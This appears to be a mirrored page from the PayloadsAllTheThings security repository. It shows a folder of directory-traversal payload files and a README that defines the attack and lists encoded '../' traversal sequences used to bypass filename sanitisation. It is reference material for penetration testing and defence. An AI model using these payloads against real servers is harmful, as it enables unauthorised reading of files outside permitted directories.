wanderer/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-28 19:31:56 +02:00
Code Issues Releases Activity
9c9e1cc082
PayloadsAllTheThings/Traversal directory
History
Swissky 77e2fc8226 LDAP & XPATH injection + Small fixes and payloads
2017-07-14 23:40:31 +02:00
..
deep_traversal.txt Traversal Dir files + Updates XSS 2016-10-21 06:12:00 +07:00
directory_traversal.txt Traversal Dir files + Updates XSS 2016-10-21 06:12:00 +07:00
dotdotpwn.txt Traversal Dir files + Updates XSS 2016-10-21 06:12:00 +07:00
README.md Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
traversals-8-deep-exotic-encoding.txt LDAP & XPATH injection + Small fixes and payloads 2017-07-14 23:40:31 +02:00

README.md

Traversal Directory

A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

Exploit

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

Thanks to